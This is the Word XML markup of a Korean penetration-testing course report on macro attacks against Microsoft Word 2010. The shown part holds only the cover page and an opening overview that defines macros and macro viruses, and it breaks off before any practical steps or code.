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ackground w:color="e7e6e6">
    <v:background id="_x0000_s1025" o:bwmode="white" o:targetscreensize="1024,768" filled="t" fillcolor="#e7e6e6"/>
  </w:background>
  <w:body>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="852"/>
        <w:gridCol w:w="871"/>
        <w:gridCol w:w="1723"/>
        <w:gridCol w:w="1742"/>
        <w:gridCol w:w="1742"/>
        <w:gridCol w:w="1763"/>
        <w:gridCol w:w="881"/>
        <w:gridCol w:w="31"/>
        <w:gridCol w:w="851"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3446" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3484" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3526" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>K</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ITRI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>모의해킹</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>기</w:t>
            </w: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1742" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4386" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>작성:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>보안팀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="882" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8753" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>Macro attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>macro attack on microsoft word 2010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1763" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1763" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>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jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>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jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3446" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3484" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3526" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10686" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="none"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10686"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="873" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>개</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>요(개념 및 실습 시나리오)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t>매크로란?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>자주 사용하는 여러 개의 명령어를 묶어서 하나의 키 입력 동작으로 만든 것을 말한다. 복잡하거나 반복되는 작업을 단순화하거나</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>자동</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve">화 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>하기</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>위한 목적으로 주로 이용한다. 어셈블리 언어에서도 많이 사용되며, 마이크로소프트 엑셀 등의</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>스프레드시</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t>트</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="off"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="&quot;Open Sans&quot;"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>도 매크로를 지원하는 등 다양한 플랫폼에서 활용된다. 반복 작업을 간단하게 수행하기 위한 목적뿐만 아니라 문서 안의 같은 문자열을 한꺼번에 변경 할 때도 사용된다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t>매크로 바이러스란?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="off"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; 새로운 파일 바이러스의 일종이다. 감염대상이 마이크로 소프트사의 엑셀, 워드 등 프로그램에서 사용하는 문서파일이다. 매크로를 사용하는 문서파일에 매크로를 등록해두고나서 문서를 읽을 시에 감염이 이루어진다는 특징이 있다. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ko-KR"/>
